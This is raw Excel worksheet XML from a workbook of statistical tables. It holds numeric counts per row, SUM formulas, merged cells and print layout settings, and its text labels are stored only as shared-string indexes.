      </c>
      <c r="D10" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E10" s="13"/>
      <c r="F10" s="13"/>
      <c r="G10" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K10" s="13"/>
      <c r="L10" s="13"/>
      <c r="M10" s="13"/>
      <c r="N10" s="13"/>
      <c r="O10" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P10" s="13"/>
      <c r="Q10" s="13"/>
      <c r="R10" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S10" s="16"/>
    </row>
    <row r="11" spans="1:19" ht="16.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C11" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D11" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E11" s="13"/>
      <c r="F11" s="13"/>
      <c r="G11" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K11" s="13"/>
      <c r="L11" s="13"/>
      <c r="M11" s="13"/>
      <c r="N11" s="13"/>
      <c r="O11" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P11" s="13"/>
      <c r="Q11" s="13"/>
      <c r="R11" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S11" s="16"/>
    </row>
    <row r="12" spans="1:19" ht="16.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C12" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D12" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E12" s="13"/>
      <c r="F12" s="13"/>
      <c r="G12" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H12" s="13"/>
      <c r="I12" s="13"/>
      <c r="J12" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K12" s="13"/>
      <c r="L12" s="13"/>
      <c r="M12" s="13"/>
      <c r="N12" s="13"/>
      <c r="O12" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P12" s="13"/>
      <c r="Q12" s="13"/>
      <c r="R12" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S12" s="16"/>
    </row>
    <row r="13" spans="1:19" ht="16.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C13" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D13" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E13" s="13"/>
      <c r="F13" s="13"/>
      <c r="G13" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H13" s="13"/>
      <c r="I13" s="13"/>
      <c r="J13" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K13" s="13"/>
      <c r="L13" s="13"/>
      <c r="M13" s="13"/>
      <c r="N13" s="13"/>
      <c r="O13" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P13" s="13"/>
      <c r="Q13" s="13"/>
      <c r="R13" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S13" s="16"/>
    </row>
    <row r="14" spans="1:19" ht="16.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C14" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D14" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E14" s="13"/>
      <c r="F14" s="13"/>
      <c r="G14" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H14" s="13"/>
      <c r="I14" s="92"/>
      <c r="J14" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K14" s="13"/>
      <c r="L14" s="13"/>
      <c r="M14" s="13"/>
      <c r="N14" s="13"/>
      <c r="O14" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P14" s="13"/>
      <c r="Q14" s="13"/>
      <c r="R14" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S14" s="16"/>
    </row>
    <row r="15" spans="1:19" ht="16.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C15" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D15" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K15" s="13"/>
      <c r="L15" s="13"/>
      <c r="M15" s="13"/>
      <c r="N15" s="13"/>
      <c r="O15" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P15" s="13"/>
      <c r="Q15" s="13"/>
      <c r="R15" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S15" s="16"/>
    </row>
    <row r="16" spans="1:19" ht="16.5" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="109">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="C16" s="109">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D16" s="111">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="E16" s="13"/>
      <c r="F16" s="13"/>
      <c r="G16" s="112">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="H16" s="13"/>
      <c r="I16" s="13"/>
      <c r="J16" s="110">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="K16" s="13"/>
      <c r="L16" s="13"/>
      <c r="M16" s="13"/>
      <c r="N16" s="13"/>
      <c r="O16" s="110">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="P16" s="13"/>
      <c r="Q16" s="13"/>
      <c r="R16" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S16" s="16"/>
    </row>
    <row r="17" spans="1:19" ht="16.5" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="109">
        <f t="shared" si="4"/>
        <v>70</v>
      </c>
      <c r="C17" s="109">
        <f t="shared" si="5"/>
        <v>20</v>
      </c>
      <c r="D17" s="111">
        <f t="shared" si="6"/>
        <v>90</v>
      </c>
      <c r="E17" s="13"/>
      <c r="F17" s="13"/>
      <c r="G17" s="112">
        <v>0</v>
      </c>
      <c r="H17" s="13">
        <v>70</v>
      </c>
      <c r="I17" s="13">
        <v>20</v>
      </c>
      <c r="J17" s="110">
        <v>90</v>
      </c>
      <c r="K17" s="13"/>
      <c r="L17" s="13"/>
      <c r="M17" s="13"/>
      <c r="N17" s="13"/>
      <c r="O17" s="110">
        <v>0</v>
      </c>
      <c r="P17" s="13">
        <v>90</v>
      </c>
      <c r="Q17" s="13"/>
      <c r="R17" s="71">
        <v>90</v>
      </c>
      <c r="S17" s="16"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="6">
    <mergeCell ref="A1:E1"/>
    <mergeCell ref="Q4:Q5"/>
    <mergeCell ref="R4:R5"/>
    <mergeCell ref="P4:P5"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="K4:K5"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.1968503937007874" right="0.03937007874015748" top="0.5511811023622047" bottom="0.5905511811023623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16"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B5" sqref="B5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="2" width="8.875" style="1" customWidth="1"/>
    <col min="3" max="3" width="8.00390625" style="1" customWidth="1"/>
    <col min="4" max="4" width="7.625" style="1" customWidth="1"/>
    <col min="5" max="5" width="7.125" style="1" customWidth="1"/>
    <col min="6" max="6" width="6.75390625" style="1" customWidth="1"/>
    <col min="7" max="7" width="7.375" style="1" customWidth="1"/>
    <col min="8" max="8" width="5.875" style="1" customWidth="1"/>
    <col min="9" max="9" width="7.125" style="1" customWidth="1"/>
    <col min="10" max="10" width="9.125" style="1" customWidth="1"/>
    <col min="11" max="11" width="8.50390625" style="1" customWidth="1"/>
    <col min="12" max="12" width="8.125" style="1" customWidth="1"/>
    <col min="13" max="14" width="7.875" style="1" customWidth="1"/>
    <col min="15" max="15" width="7.625" style="1" customWidth="1"/>
    <col min="16" max="16" width="7.875" style="1" customWidth="1"/>
    <col min="17" max="17" width="8.125" style="1" customWidth="1"/>
    <col min="18" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" s="12" customFormat="1" ht="20.25" customHeight="1">
      <c r="A1" s="180" t="s">
        <v>409</v>
      </c>
      <c r="B1" s="180"/>
      <c r="C1" s="180"/>
      <c r="D1" s="180"/>
      <c r="E1" s="180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2" customFormat="1" ht="20.25" customHeight="1">
      <c r="A2" s="74"/>
      <c r="B2" s="74"/>
      <c r="C2" s="74"/>
      <c r="D2" s="74"/>
      <c r="E2" s="74"/>
      <c r="F2" s="5"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="5"/>
      <c r="K2" s="5"/>
      <c r="L2" s="5"/>
      <c r="M2" s="5"/>
      <c r="N2" s="5"/>
      <c r="O2" s="5"/>
      <c r="P2" s="5" t="s">
        <v>332</v>
      </c>
      <c r="Q2" s="5"/>
    </row>
    <row r="3" spans="1:17" ht="20.25" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>182</v>
      </c>
      <c r="B3" s="66" t="s">
        <v>15</v>
      </c>
      <c r="C3" s="66"/>
      <c r="D3" s="66"/>
      <c r="E3" s="66"/>
      <c r="F3" s="66"/>
      <c r="G3" s="66"/>
      <c r="H3" s="66"/>
      <c r="I3" s="66"/>
      <c r="J3" s="66" t="s">
        <v>16</v>
      </c>
      <c r="K3" s="66"/>
      <c r="L3" s="66"/>
      <c r="M3" s="66"/>
      <c r="N3" s="66"/>
      <c r="O3" s="66"/>
      <c r="P3" s="66"/>
      <c r="Q3" s="66"/>
    </row>
    <row r="4" spans="1:17" ht="20.25" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="62" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>103</v>
      </c>
      <c r="D4" s="63" t="s">
        <v>104</v>
      </c>
      <c r="E4" s="64" t="s">
        <v>1</v>
      </c>
      <c r="F4" s="64" t="s">
        <v>88</v>
      </c>
      <c r="G4" s="64" t="s">
        <v>89</v>
      </c>
      <c r="H4" s="64" t="s">
        <v>4</v>
      </c>
      <c r="I4" s="64" t="s">
        <v>105</v>
      </c>
      <c r="J4" s="64" t="s">
        <v>10</v>
      </c>
      <c r="K4" s="64" t="s">
        <v>103</v>
      </c>
      <c r="L4" s="64" t="s">
        <v>104</v>
      </c>
      <c r="M4" s="64" t="s">
        <v>1</v>
      </c>
      <c r="N4" s="64" t="s">
        <v>88</v>
      </c>
      <c r="O4" s="64" t="s">
        <v>89</v>
      </c>
      <c r="P4" s="64" t="s">
        <v>4</v>
      </c>
      <c r="Q4" s="64" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="5" spans="1:17" ht="16.5" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="65">
        <f aca="true" t="shared" si="0" ref="B5:Q5">SUM(B6:B16)</f>
        <v>898</v>
      </c>
      <c r="C5" s="65">
        <f t="shared" si="0"/>
        <v>845</v>
      </c>
      <c r="D5" s="65">
        <f t="shared" si="0"/>
        <v>35</v>
      </c>
      <c r="E5" s="65">
        <f t="shared" si="0"/>
        <v>17</v>
      </c>
      <c r="F5" s="65">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="G5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="65">
        <f t="shared" si="0"/>
        <v>1243</v>
      </c>
      <c r="K5" s="65">
        <f t="shared" si="0"/>
        <v>1074</v>
      </c>
      <c r="L5" s="65">
        <f t="shared" si="0"/>
        <v>62</v>
      </c>
      <c r="M5" s="65">
        <f t="shared" si="0"/>
        <v>35</v>
      </c>
      <c r="N5" s="65">
        <f t="shared" si="0"/>
        <v>30</v>
      </c>
      <c r="O5" s="65">
        <f t="shared" si="0"/>
        <v>42</v>
      </c>
      <c r="P5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="Q5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:17" ht="16.5" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="80">
        <f>SUM(C6:I6)</f>
        <v>125</v>
      </c>
      <c r="C6" s="13">
        <v>125</v>
      </c>
      <c r="D6" s="13"/>
      <c r="E6" s="13"/>
      <c r="F6" s="13"/>
      <c r="G6" s="13"/>
      <c r="H6" s="13"/>
      <c r="I6" s="13"/>
      <c r="J6" s="71">
        <f>SUM(K6:Q6)</f>
        <v>223</v>
      </c>
      <c r="K6" s="13">
        <v>223</v>
      </c>
      <c r="L6" s="13"/>
      <c r="M6" s="13"/>
      <c r="N6" s="13"/>
      <c r="O6" s="13"/>
      <c r="P6" s="13"/>
      <c r="Q6" s="13"/>
    </row>
    <row r="7" spans="1:17" ht="16.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="80">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:I7)</f>
        <v>131</v>
      </c>
      <c r="C7" s="13">
        <v>120</v>
      </c>
      <c r="D7" s="13">
        <v>11</v>
      </c>
      <c r="E7" s="13"/>
      <c r="F7" s="13"/>
      <c r="G7" s="13"/>
      <c r="H7" s="13"/>
      <c r="I7" s="13"/>
      <c r="J7" s="71">
        <f>SUM(K7:Q7)</f>
        <v>186</v>
      </c>
      <c r="K7" s="13">
        <v>131</v>
      </c>
      <c r="L7" s="13">
        <v>55</v>
      </c>
      <c r="M7" s="13"/>
      <c r="N7" s="13"/>
      <c r="O7" s="13"/>
      <c r="P7" s="13"/>
      <c r="Q7" s="13"/>
    </row>
    <row r="8" spans="1:17" ht="16.5" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="80">
        <f t="shared" si="1"/>
        <v>110</v>
      </c>
      <c r="C8" s="13">
        <v>75</v>
      </c>
      <c r="D8" s="13">
        <v>20</v>
      </c>
      <c r="E8" s="13">
        <v>15</v>
      </c>
      <c r="F8" s="13"/>
      <c r="G8" s="13"/>
      <c r="H8" s="13"/>
      <c r="I8" s="13"/>
      <c r="J8" s="71">
        <f>SUM(K8:Q8)</f>
        <v>218</v>
      </c>
      <c r="K8" s="13">
        <v>160</v>
      </c>
      <c r="L8" s="13">
        <v>0</v>
      </c>
      <c r="M8" s="13">
        <v>16</v>
      </c>
      <c r="N8" s="13">
        <v>0</v>
      </c>
      <c r="O8" s="13">
        <v>42</v>
      </c>
      <c r="P8" s="13">
        <v>0</v>
      </c>
      <c r="Q8" s="13">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:17" ht="16.5" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="80">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="13"/>
      <c r="D9" s="13"/>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="13"/>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="71">
        <f aca="true" t="shared" si="2" ref="J9:J15">SUM(K9:Q9)</f>
        <v>0</v>
      </c>
      <c r="K9" s="13"/>
      <c r="L9" s="13"/>
      <c r="M9" s="13"/>
      <c r="N9" s="13"/>
      <c r="O9" s="13"/>
      <c r="P9" s="13"/>
      <c r="Q9" s="13"/>
    </row>
    <row r="10" spans="1:17" ht="16.5" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="80">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="13"/>
      <c r="D10" s="13"/>
      <c r="E10" s="13"/>
      <c r="F10" s="13"/>
      <c r="G10" s="13"/>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="71">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K10" s="13"/>
      <c r="L10" s="13"/>
      <c r="M10" s="13"/>
      <c r="N10" s="13"/>
      <c r="O10" s="13"/>
      <c r="P10" s="13"/>
      <c r="Q10" s="13"/>
    </row>
    <row r="11" spans="1:17" ht="16.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="80">
        <f t="shared" si="1"/>
        <v>119</v>
      </c>
      <c r="C11" s="13">
        <v>118</v>
      </c>
      <c r="D11" s="13"/>
      <c r="E11" s="13">
        <v>1</v>
      </c>
      <c r="F11" s="13"/>
      <c r="G11" s="13"/>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="71">
        <f t="shared" si="2"/>
        <v>141</v>
      </c>
      <c r="K11" s="13">
        <v>123</v>
      </c>
      <c r="L11" s="13"/>
      <c r="M11" s="13">
        <v>18</v>
      </c>
      <c r="N11" s="13"/>
      <c r="O11" s="13"/>
      <c r="P11" s="13"/>
      <c r="Q11" s="13"/>
    </row>
    <row r="12" spans="1:17" ht="16.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="80">
        <f t="shared" si="1"/>
        <v>134</v>
      </c>
      <c r="C12" s="13">
        <v>129</v>
      </c>
      <c r="D12" s="13">
        <v>4</v>
      </c>
      <c r="E12" s="13">
        <v>1</v>
      </c>
      <c r="F12" s="13"/>
      <c r="G12" s="13"/>
      <c r="H12" s="13"/>
      <c r="I12" s="13"/>
      <c r="J12" s="71">
        <f t="shared" si="2"/>
        <v>134</v>
      </c>
      <c r="K12" s="13">
        <v>129</v>
      </c>
      <c r="L12" s="13">
        <v>4</v>
      </c>
      <c r="M12" s="13">
        <v>1</v>
      </c>
      <c r="N12" s="13"/>
      <c r="O12" s="13"/>
      <c r="P12" s="13"/>
      <c r="Q12" s="13"/>
    </row>
    <row r="13" spans="1:17" ht="16.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="80">
        <f t="shared" si="1"/>
        <v>92</v>
      </c>
      <c r="C13" s="13">
        <v>92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71">
        <f t="shared" si="2"/>
        <v>112</v>
      </c>
      <c r="K13" s="13">
        <v>112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ht="16.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="80">
        <f t="shared" si="1"/>
        <v>78</v>
      </c>
      <c r="C14" s="13">
        <v>78</v>
      </c>
      <c r="D14" s="13"/>
      <c r="E14" s="13"/>
      <c r="F14" s="13"/>
      <c r="G14" s="13"/>
      <c r="H14" s="13"/>
      <c r="I14" s="13"/>
      <c r="J14" s="71">
        <f t="shared" si="2"/>
        <v>88</v>
      </c>
      <c r="K14" s="13">
        <v>88</v>
      </c>
      <c r="L14" s="13"/>
      <c r="M14" s="13"/>
      <c r="N14" s="13"/>
      <c r="O14" s="13"/>
      <c r="P14" s="13"/>
      <c r="Q14" s="13"/>
    </row>
    <row r="15" spans="1:17" ht="16.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="80">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C15" s="13"/>
      <c r="D15" s="13"/>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="13"/>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="71">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K15" s="13"/>
      <c r="L15" s="13"/>
      <c r="M15" s="13"/>
      <c r="N15" s="13"/>
      <c r="O15" s="13"/>
      <c r="P15" s="13"/>
      <c r="Q15" s="13"/>
    </row>
    <row r="16" spans="1:17" ht="16.5" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="80">
        <f t="shared" si="1"/>
        <v>109</v>
      </c>
      <c r="C16" s="13">
        <v>108</v>
      </c>
      <c r="D16" s="13">
        <v>0</v>
      </c>
      <c r="E16" s="13">
        <v>0</v>
      </c>
      <c r="F16" s="13">
        <v>1</v>
      </c>
      <c r="G16" s="13">
        <v>0</v>
      </c>
      <c r="H16" s="13">
        <v>0</v>
      </c>
      <c r="I16" s="13">
        <v>0</v>
      </c>
      <c r="J16" s="71">
        <v>141</v>
      </c>
      <c r="K16" s="13">
        <v>108</v>
      </c>
      <c r="L16" s="13">
        <v>3</v>
      </c>
      <c r="M16" s="13">
        <v>0</v>
      </c>
      <c r="N16" s="13">
        <v>30</v>
      </c>
      <c r="O16" s="13">
        <v>0</v>
      </c>
      <c r="P16" s="13">
        <v>0</v>
      </c>
      <c r="Q16" s="13">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="2">
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="A1:E1"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.9055118110236221" right="0.2362204724409449" top="0.984251968503937" bottom="0.5118110236220472" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup horizontalDpi="300" verticalDpi="300" orientation="landscape" paperSize="9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T17"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="D6" sqref="D6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="10" width="8.75390625" style="1" customWidth="1"/>
    <col min="11" max="11" width="8.875" style="1" customWidth="1"/>
    <col min="12" max="12" width="8.375" style="1" customWidth="1"/>
    <col min="13" max="13" width="10.625" style="1" customWidth="1"/>
    <col min="14" max="14" width="10.25390625" style="1" customWidth="1"/>
    <col min="15" max="15" width="9.00390625" style="1" customWidth="1"/>
    <col min="16" max="16" width="12.25390625" style="1" customWidth="1"/>
    <col min="17" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14" ht="20.25" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>410</v>
      </c>
      <c r="B1" s="10"/>
      <c r="C1" s="10"/>
      <c r="D1" s="10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0.25" customHeight="1">
      <c r="A2" s="10"/>
      <c r="B2" s="10"/>
      <c r="C2" s="10"/>
      <c r="D2" s="10"/>
      <c r="E2" s="5"/>
      <c r="F2" s="5"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="5"/>
      <c r="K2" s="5"/>
      <c r="L2" s="5"/>
      <c r="M2" s="5" t="s">
        <v>331</v>
      </c>
      <c r="N2" s="5"/>
    </row>
    <row r="3" spans="1:18" ht="20.25" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>180</v>
      </c>
      <c r="B3" s="66" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="66"/>
      <c r="D3" s="66"/>
      <c r="E3" s="66"/>
      <c r="F3" s="66"/>
      <c r="G3" s="66"/>
      <c r="H3" s="66"/>
      <c r="I3" s="66"/>
      <c r="J3" s="66"/>
      <c r="K3" s="66" t="s">
        <v>106</v>
      </c>
      <c r="L3" s="66"/>
      <c r="M3" s="66"/>
      <c r="N3" s="66"/>
      <c r="O3" s="130" t="s">
        <v>374</v>
      </c>
      <c r="P3" s="130"/>
      <c r="Q3" s="130"/>
      <c r="R3" s="130"/>
    </row>
    <row r="4" spans="1:20" ht="20.25" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="66" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="66"/>
      <c r="D4" s="66"/>
      <c r="E4" s="66" t="s">
        <v>107</v>
      </c>
      <c r="F4" s="66"/>
      <c r="G4" s="66"/>
      <c r="H4" s="66" t="s">
        <v>108</v>
      </c>
      <c r="I4" s="66"/>
      <c r="J4" s="66"/>
      <c r="K4" s="200" t="s">
        <v>319</v>
      </c>
      <c r="L4" s="200" t="s">
        <v>109</v>
      </c>
      <c r="M4" s="200" t="s">
        <v>269</v>
      </c>
      <c r="N4" s="200" t="s">
        <v>10</v>
      </c>
      <c r="O4" s="199" t="s">
        <v>376</v>
      </c>
      <c r="P4" s="197" t="s">
        <v>377</v>
      </c>
      <c r="Q4" s="199" t="s">
        <v>375</v>
      </c>
      <c r="R4" s="199" t="s">
        <v>10</v>
      </c>
      <c r="T4" s="131"/>
    </row>
    <row r="5" spans="1:20" ht="20.25" customHeight="1">
      <c r="A5" s="179"/>
      <c r="B5" s="62" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="62" t="s">
        <v>13</v>
      </c>
      <c r="D5" s="63" t="s">
        <v>10</v>
      </c>
      <c r="E5" s="64" t="s">
        <v>12</v>
      </c>
      <c r="F5" s="64" t="s">
        <v>13</v>
      </c>
      <c r="G5" s="64" t="s">
        <v>10</v>
      </c>
      <c r="H5" s="64" t="s">
        <v>12</v>
      </c>
      <c r="I5" s="64" t="s">
        <v>13</v>
      </c>
      <c r="J5" s="64" t="s">
        <v>10</v>
      </c>
      <c r="K5" s="201"/>
      <c r="L5" s="201"/>
      <c r="M5" s="201"/>
      <c r="N5" s="201"/>
      <c r="O5" s="198"/>
      <c r="P5" s="198"/>
      <c r="Q5" s="198"/>
      <c r="R5" s="198"/>
      <c r="T5" s="132"/>
    </row>
    <row r="6" spans="1:20" ht="16.5" customHeight="1">
      <c r="A6" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="65">
        <f aca="true" t="shared" si="0" ref="B6:R6">SUM(B7:B17)</f>
        <v>679</v>
      </c>
      <c r="C6" s="65">
        <f t="shared" si="0"/>
        <v>564</v>
      </c>
      <c r="D6" s="65">
        <f t="shared" si="0"/>
        <v>1243</v>
      </c>
      <c r="E6" s="65">
        <f t="shared" si="0"/>
        <v>232</v>
      </c>
      <c r="F6" s="65">
        <f t="shared" si="0"/>
        <v>244</v>
      </c>
      <c r="G6" s="65">
        <f t="shared" si="0"/>
        <v>476</v>
      </c>
      <c r="H6" s="65">
        <f t="shared" si="0"/>
        <v>447</v>
      </c>
      <c r="I6" s="65">
        <f t="shared" si="0"/>
        <v>320</v>
      </c>
      <c r="J6" s="65">
        <f t="shared" si="0"/>
        <v>770</v>
      </c>
      <c r="K6" s="65">
        <f t="shared" si="0"/>
        <v>304</v>
      </c>
      <c r="L6" s="65">
        <f t="shared" si="0"/>
        <v>156</v>
      </c>
      <c r="M6" s="65">
        <f t="shared" si="0"/>
        <v>783</v>
      </c>
      <c r="N6" s="65">
        <f t="shared" si="0"/>
        <v>1243</v>
      </c>
      <c r="O6" s="127">
        <f t="shared" si="0"/>
        <v>478</v>
      </c>
      <c r="P6" s="127">
        <f t="shared" si="0"/>
        <v>608</v>
      </c>
      <c r="Q6" s="127">
        <f t="shared" si="0"/>
        <v>157</v>
      </c>
      <c r="R6" s="127">
        <f t="shared" si="0"/>
        <v>1243</v>
      </c>
      <c r="T6" s="132"/>
    </row>
    <row r="7" spans="1:20" ht="16.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="109">
        <f>SUM(E7,H7)</f>
        <v>90</v>
      </c>
      <c r="C7" s="109">
        <f>SUM(F7,I7)</f>
        <v>133</v>
      </c>
      <c r="D7" s="109">
        <f>SUM(B7:C7)</f>
        <v>223</v>
      </c>
      <c r="E7" s="13">
        <v>37</v>
      </c>
      <c r="F7" s="13">
        <v>43</v>
      </c>
